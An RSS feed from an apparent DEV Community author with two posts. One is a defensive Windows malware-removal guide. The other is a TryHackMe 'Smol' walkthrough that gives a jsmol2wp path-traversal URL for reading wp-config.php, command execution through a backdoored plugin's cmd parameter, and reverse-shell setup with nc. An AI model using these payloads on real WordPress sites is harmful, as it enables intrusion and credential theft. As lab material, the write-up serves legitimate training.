<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Cybrpunked</title>
    <description>The latest articles on DEV Community by Cybrpunked (@cybrpunked).</description>
    <link>https://dev.to/cybrpunked</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2942406%2F58de73a3-84f8-426e-bd0d-eff79f716331.png</url>
      <title>DEV Community: Cybrpunked</title>
      <link>https://dev.to/cybrpunked</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/cybrpunked"/>
    <language>en</language>
    <item>
      <title>Windows Security Alert: Signs of a Hack &amp; How to Remove Malware</title>
      <dc:creator>Cybrpunked</dc:creator>
      <pubDate>Tue, 18 Mar 2025 18:08:02 +0000</pubDate>
      <link>https://dev.to/cybrpunked/windows-security-alert-signs-of-a-hack-how-to-remove-malware-1gin</link>
      <guid>https://dev.to/cybrpunked/windows-security-alert-signs-of-a-hack-how-to-remove-malware-1gin</guid>
      <description>&lt;p&gt;I have always envisaged to myself- what happens when my device gets &lt;strong&gt;hacked&lt;/strong&gt; when I’m working on Windows OS.&lt;br&gt;
Or should I give it a thought that it’s already hacked and the attacker is just sittin’ on a cozy couch and sippin’ his/her coffee ☕ looking at me and my screen?&lt;br&gt;
&lt;strong&gt;Hackers&lt;/strong&gt;, huh?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbkvirccr59s2d0r0t4uq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbkvirccr59s2d0r0t4uq.png" alt="Hacker hacking Windows" width="800" height="800"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Bonjour Peers!
&lt;/h2&gt;

&lt;p&gt;Today, we are going to take a look on the topic that was mentioned in the title that got you into this page. I have myself encountered dubious activities that was happening in my windows environment. Let me spill what I experienced to you.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;My Experience:&lt;/strong&gt; I had my suspicion on my Windows for quite a long time, but I didn’t give it a thought as I was and is using Linux most of the time. I didn’t open windows at all for a while. However, each and every time I open my Windows, there would be some kind of a script that runs for a second within a flash — and this got me swirling my mind like a driller into the thin wall, as this in every perspective is unusual for any system.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Windows OS have a market share of 73% on a global scale- according to the report of 2024. The same report till February 2025, has experienced a down turn, and has a share of 68% of users to it.&lt;br&gt;
Hence, knowing how to act immediately when a hack is carried out is extremely essential for the users of their own devices in use.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Then I did a few methods to clean up.&lt;/p&gt;

&lt;p&gt;Let’s now get down to business. 👔💼&lt;/p&gt;
&lt;h2&gt;
  
  
  Step-by-Step Guide to Contain, Investigate &amp;amp; Isolate the System:
&lt;/h2&gt;
&lt;h2&gt;
  
  
  🚨 Immediate Action (Containment):
&lt;/h2&gt;

&lt;p&gt;1) &lt;strong&gt;Disconnect System from Internet&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Plug out the Ethernet cable or try to disconnect the Wi-Fi on the system. This will be the first thing that you need to do once you are damn suspicious.&lt;/p&gt;

&lt;p&gt;2) &lt;strong&gt;Quarantine the Affected Machine&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If the computer is live on a network, you must disconnect it from that network before the attacker does lateral movement.&lt;/p&gt;

&lt;p&gt;3) &lt;strong&gt;Change the Passwords on a Different Device&lt;/strong&gt;&lt;br&gt;
   DO NOT change any passwords on the compromised machine. Use another separate machine to change the credentials for:&lt;/p&gt;

&lt;p&gt;i) &lt;strong&gt;Windows login&lt;/strong&gt; (applies only if its in an Active Directory) from the domain controller with proper authority access and not from your compromised machine.&lt;/p&gt;

&lt;p&gt;ii) &lt;strong&gt;Online Accounts&lt;/strong&gt; like banking, emails, social media, etc.&lt;/p&gt;

&lt;p&gt;iii) &lt;strong&gt;Administrator accounts&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;4) &lt;strong&gt;Check for Unknown Usernames &amp;amp; Sessions&lt;/strong&gt;&lt;br&gt;
  Open Task Manager by pressing &lt;strong&gt;Ctrl + Shift + Esc&lt;/strong&gt; (or) Right-clicking on the Windows button on your taskbar, and click ‘&lt;strong&gt;Task Manager&lt;/strong&gt;,’ and see if unknown users are logged in (attackers use a different name most of the time).&lt;/p&gt;

&lt;p&gt;5) &lt;strong&gt;Using Cmd Prompt to see Local Users (Applicable for Active Directory Environment)&lt;/strong&gt;&lt;br&gt;
   Click on search tab from Desktop page and type “cmd”. Right click on the command prompt, then select ‘Run as administrator’ and open it.&lt;br&gt;
    Then type:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;net user
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;which will list ALL the local users. If you see an unknown user, then the system is compromised.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;End Malicious Tasks&lt;/strong&gt;
Open Task Manager by pressing &lt;strong&gt;Ctrl + Shift + Esc&lt;/strong&gt; → &lt;strong&gt;Process Tab&lt;/strong&gt;.
(or)
Right click on the Windows icon from taskbar and click ‘&lt;strong&gt;Task Manager&lt;/strong&gt;’ which will open it.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Look for suspicious processes (high CPU usage, unfamiliar names).&lt;/p&gt;

&lt;p&gt;→ Right-click → End Task (if you suspect it’s malicious).&lt;/p&gt;

&lt;p&gt;🔦 Investigation &amp;amp; Evidence&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;7. Check Recent Logins&lt;/strong&gt;&lt;br&gt;
Run the below command in Terminal as an Administrator:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;net user &amp;lt;USERNAME&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Replace  with the actual user account name to check the last login time.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Open Event Viewer:&lt;/strong&gt;&lt;br&gt;
→ Press &lt;strong&gt;Win + R&lt;/strong&gt;, type &lt;strong&gt;eventvwr.msc&lt;/strong&gt;, and press Enter.&lt;/p&gt;

&lt;p&gt;→ Navigate to &lt;strong&gt;Windows Logs&lt;/strong&gt; → &lt;strong&gt;Security&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;→ Look for Event IDs: &lt;strong&gt;4624 (Successful Login)&lt;/strong&gt; and &lt;strong&gt;4625 (Failed Login Attempts)&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;8. Check Network Connections for Backdoors&lt;/strong&gt;&lt;br&gt;
Open the Command prompt as Administrator and run the below command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;netstat -ano
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;→ This will show you the active connections.&lt;br&gt;
→ Look for suspicious IP addresses- essentially the foreign ones for unusual process maintaining active connections.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Killing the Process:&lt;/strong&gt;&lt;br&gt;
If you come to encounter, enter the below command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;taskkill /PID &amp;lt;PID&amp;gt; /F
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Replace the ‘’ with the Process ID. For example,&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;taskkill /PID 1427 /F
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Block the Malicious IP in Windows Firewall:&lt;/strong&gt;&lt;br&gt;
Enter the below command to block the IP in firewall,&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
netsh advfirewall firewall add rule name="Block Backdoor IP" dir=out action=block remoteip=&amp;lt;IP&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;9. Scan for Malware &amp;amp; Rootkits&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Using the In-built Windows Defender:&lt;/strong&gt;&lt;br&gt;
Open Windows Security → Virus &amp;amp; Threat Protection → Quick Scan.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Using Third Party Anti-Malware Software to use:&lt;/strong&gt;&lt;br&gt;
Use legit software like:&lt;/p&gt;

&lt;p&gt;i) &lt;strong&gt;Malwarebytes&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;ii) &lt;strong&gt;ClamWin&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;iii) &lt;strong&gt;Kaspersky&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;iv) &lt;strong&gt;Hitman Pro&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;10. Look for New Startup Programs &amp;amp; Services&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;→ Open &lt;strong&gt;Task Manager&lt;/strong&gt; → &lt;strong&gt;Startup Tab&lt;/strong&gt;&lt;br&gt;
Disable unknown or suspicious program&lt;/p&gt;

&lt;p&gt;→ Open &lt;strong&gt;Run (Win + R)&lt;/strong&gt; Type ‘&lt;strong&gt;services.msc&lt;/strong&gt;’ .&lt;br&gt;
Look for newly running or newly installed services running in the background.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;11. Check for Newly Installed Programs &amp;amp; Drivers&lt;/strong&gt;&lt;br&gt;
→ Open Control Panel → Programs &amp;amp; Features.&lt;br&gt;
→ Look for recently installed or unknown software.&lt;/p&gt;

&lt;h2&gt;
  
  
  🛠️ Recovery &amp;amp; Remediation
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Remove the Threat&lt;/strong&gt;&lt;br&gt;
→ Uninstall malicious software from Control Panel.&lt;/p&gt;

&lt;p&gt;→ Use Autoruns (Sysinternals) to disable persistent malware.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Restore System to a Safe State&lt;/strong&gt;&lt;br&gt;
→ If backups exist, restore to a previous state via System Restore.&lt;/p&gt;

&lt;p&gt;→ If files are encrypted (ransomware attack), use a clean backup.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reinstall Windows (If Necessary)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If the infection is deep (rootkit, ransomware), perform a full Windows reset:&lt;/p&gt;

&lt;p&gt;→ Settings → Update &amp;amp; Security → Recovery → Reset this PC.&lt;/p&gt;

&lt;p&gt;→ Choose “&lt;strong&gt;Remove Everything&lt;/strong&gt;” for a clean installation.&lt;/p&gt;

&lt;h2&gt;
  
  
  🔒 Strengthening Security
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;1. Enable Multi-Factor Authentication (MFA)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;→ Activate MFA on all important accounts (email, banking, cloud).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Update Windows &amp;amp; Software&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;→ Ensure Windows Updates and antivirus definitions are up to date.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Use a Firewall &amp;amp; Secure Network&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;→ Enable Windows Defender Firewall or use a reputable third-party firewall.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Monitor for Further Threats&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;→ Set up Windows Security Alerts and regularly check logs.&lt;/p&gt;

&lt;p&gt;🛑 If You Suspect a Serious Breach:&lt;/p&gt;

&lt;p&gt;→ &lt;strong&gt;Contact&lt;/strong&gt; a cybersecurity professional or incident response team.&lt;br&gt;
→ If sensitive data was stolen, &lt;strong&gt;notify authorities&lt;/strong&gt; (if applicable).&lt;/p&gt;

&lt;h2&gt;
  
  
  🏁 Conclusion: Take Back Control — Secure Your Windows PC Now!
&lt;/h2&gt;

&lt;p&gt;If your Windows PC has been hacked, time is of the essence. Cybercriminals can steal your data, track your activities, or even use your device for malicious purposes. But here’s the good news — you can eliminate threats and secure your system fast with the right approach.&lt;/p&gt;

&lt;p&gt;By detecting suspicious activity, removing malware, and closing security gaps, you can restore control and protect your personal information. However, cybersecurity isn’t just about fixing a hack — it’s about preventing one.&lt;/p&gt;

&lt;p&gt;To keep your Windows PC safe from hackers, always:&lt;br&gt;
✅ Keep your system and software updated&lt;br&gt;
✅ Use strong, unique passwords with multi-factor authentication&lt;br&gt;
✅ Run regular malware scans and monitor network activity&lt;br&gt;
✅ Enable a firewall and limit unnecessary remote access&lt;/p&gt;

&lt;p&gt;By staying proactive, you can turn your Windows PC into a cyber-fortress — one that hackers won’t stand a chance against. Stay safe, stay updated, and stay one step ahead of cyber threats! 🔒💻&lt;/p&gt;

&lt;p&gt;🗨️ Comment your thoughts below!&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>penetrationtesting</category>
      <category>infosec</category>
      <category>malware</category>
    </item>
    <item>
      <title>TryHackMe Smol Walkthrough: Step-by-Step Guide to Exploitation &amp; Privilege Escalation</title>
      <dc:creator>Cybrpunked</dc:creator>
      <pubDate>Fri, 14 Mar 2025 19:07:12 +0000</pubDate>
      <link>https://dev.to/cybrpunked/tryhackme-smol-walkthrough-step-by-step-guide-to-exploitation-privilege-escalation-241e</link>
      <guid>https://dev.to/cybrpunked/tryhackme-smol-walkthrough-step-by-step-guide-to-exploitation-privilege-escalation-241e</guid>
      <description>&lt;h2&gt;
  
  
  Bonjour Hunters! ▄︻デ══━一💥
&lt;/h2&gt;

&lt;p&gt;They say &lt;strong&gt;size&lt;/strong&gt; doesn’t matter — and the Smol machine on TryHackMe proves just that! Don’t let the name fool you; this box packs a punch with tricky exploits, enumeration &amp;amp; privilege escalation techniques.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fauro3yd5lpfgdmedjdyt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fauro3yd5lpfgdmedjdyt.png" alt="Smol | Credit: TryHackMe" width="300" height="300"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In this write-up, I’ll walk you through the full hacking process, from enumeration to root access, while sharing insights along the way.&lt;/p&gt;

&lt;p&gt;Let’s dive in and pwn Smol like a pro! 🚀&lt;/p&gt;

&lt;p&gt;To access the web page, we have to add the IP address to &lt;strong&gt;/etc/hosts&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;echo "&amp;lt;ip&amp;gt;  www.smol.thm" &amp;gt;&amp;gt; /etc/hosts
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then we visit the web page of the IP, in which we will be taken to this page below👇:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4d3g0qqq76g774xny7b4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4d3g0qqq76g774xny7b4.png" alt="Smol home web page" width="800" height="421"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The first thing that we do here is to look for source code of the web page. But nothing unusual in there.&lt;/p&gt;

&lt;p&gt;Then I tried &lt;strong&gt;ffuf&lt;/strong&gt; &amp;amp; &lt;strong&gt;nmap&lt;/strong&gt; for Subdomain fuzzing &amp;amp; port scanning respectively but nothing unusual there too.&lt;/p&gt;

&lt;p&gt;💡 Then my brain gave me a kick on what to do next…&lt;/p&gt;

&lt;p&gt;As the page uses WordPress, lets just simply try enumerating it with &lt;strong&gt;WPScan&lt;/strong&gt; tool.&lt;/p&gt;

&lt;p&gt;🔎If you have no idea about WPScan and want to know about &amp;amp; use it, kindly read this- Learn about WPScan Command Line Usage to understand about WordPress Vulns&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Slack&lt;/em&gt; the keyboard with the following cmd:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;wpscan --url www.smol.thm --enumerate ap,t,u
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;ap — all plugin enumeration&lt;br&gt;
t — looks for outdated themes for vulns&lt;br&gt;
u — identifies users of that page&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvausq1n3qej36e6ltznt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvausq1n3qej36e6ltznt.png" alt="wpscan" width="537" height="300"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After the scanning is done, we should analyze the scanned output it gives.&lt;/p&gt;

&lt;p&gt;𖥠 While looking through it, one name among the plugins caught my eye!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fstgjf4uv8kvo58037x9r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fstgjf4uv8kvo58037x9r.png" alt="jsmol2wp plugin" width="618" height="200"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I was suspicious about our little guy- &lt;strong&gt;jsmol2wp&lt;/strong&gt;. So I looked through the internet and &lt;em&gt;YES it is vulnerable!&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;And wow! We have also gathered info about the users!&lt;br&gt;
Save all these info in a file.&lt;/p&gt;

&lt;p&gt;As we can see that the plugin is vulnerable, first lets try to crack into it with the help of few research through google.&lt;/p&gt;

&lt;p&gt;After few minutes⏱️ of research, I came across this GitHub page:&lt;br&gt;
&lt;a href="https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt" rel="noopener noreferrer"&gt;https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt&lt;/a&gt;&lt;br&gt;
in which we can see a clue under the POC side heading.&lt;br&gt;
To clarify, lets try it…&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php
?isform=true
&amp;amp;call=getRawDataFromDatabase
&amp;amp;query=php://filter/resource=../../../../wp-config.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Got it!&lt;br&gt;
We got something going on in this page…&lt;/p&gt;

&lt;p&gt;When looked through it, we are able to see the Username and Password of a database. Great!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgb71hj65cjf5ytvlvjnb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgb71hj65cjf5ytvlvjnb.png" alt="wp-config.php page" width="651" height="260"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Let’s navigate to the web page: &lt;a href="http://www.smol.thm/wp-admin" rel="noopener noreferrer"&gt;http://www.smol.thm/wp-admin&lt;/a&gt;&lt;br&gt;
So that we can login with the creds we got.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffsn5wthjuhjysxwp44fp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffsn5wthjuhjysxwp44fp.png" alt="wp-user login" width="277" height="300"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;✅We are logged in.&lt;/p&gt;

&lt;p&gt;Now, its time for us to roam around and see what we find.&lt;/p&gt;

&lt;p&gt;When looking around the page- section-by-section, we are able to find Pages in it. Under that section, we are able to see this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F35xridbvhiqvrfevw257.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F35xridbvhiqvrfevw257.png" alt="Page section" width="800" height="257"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The author here is ‘admin’, and when clicked into ‘Webmaster Tasks!!’ we are seeing this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F31qvzvufmkesp9wg8z5t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F31qvzvufmkesp9wg8z5t.png" alt="Webmaster Tasks!!" width="800" height="234"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It says we should check the code of “Holly Dolly” plugin. I looked for github pages for clues, and I found out that the Holly Dolly will have a source code page in the name of ‘&lt;strong&gt;hello.php&lt;/strong&gt;’&lt;/p&gt;

&lt;p&gt;It looks like, any plugin will be having a url that’s similar to:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/wp-content/plugins/jsmol2wp/php/jsmol.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After several tries that failed, I managed to crack the hidden page.&lt;br&gt;
Hence, let’s modify our url to the following 👇:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php
?isform=true
&amp;amp;call=getRawDataFromDatabase
&amp;amp;query=php://filter/resource=../../../../wp-content/plugins/hello.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And yes, we caught the page in our hands!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvudwluivb8bh7byi40jx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvudwluivb8bh7byi40jx.png" alt="hello.php page" width="393" height="300"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When scrolling through the page, there’s a hash value that we are able to see:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F51b7bsab404wjg9i3uui.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F51b7bsab404wjg9i3uui.png" alt="hash value" width="800" height="64"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Let’s open &lt;strong&gt;&lt;a href="https://gchq.github.io/CyberChef/" rel="noopener noreferrer"&gt;Cyberchef&lt;/a&gt;&lt;/strong&gt; and see what we find.&lt;/p&gt;

&lt;p&gt;When pasted the hash value into the input and click the magic wand near the output, we get:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fug1g2x7pkf8ff9zmcz4z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fug1g2x7pkf8ff9zmcz4z.png" alt="cyberchef output" width="739" height="114"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is an indication there’s a flaw in the web page.&lt;br&gt;
An indication that states to use ‘cmd’ inside “$_GET” , as of&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$_GET["cmd"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Aight!&lt;/p&gt;

&lt;p&gt;Try to change the Url of the link to&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://www.smol.thm/wp-admin/edit.php?cmd=whoami
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You’ll get the output on the page as this&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxzo6fea4kl5q5jwz54lu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxzo6fea4kl5q5jwz54lu.png" alt="command output on page reflects" width="732" height="135"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Well well well gang!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Let’s teach this machine to talk back 😉&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Head to &lt;a href="//revshells.com"&gt;revshells.com&lt;/a&gt; and look for ‘busybox nc -e’ and click on it.&lt;/p&gt;

&lt;p&gt;Start up the listener in your terminal-&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nc -lvnp 9001
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



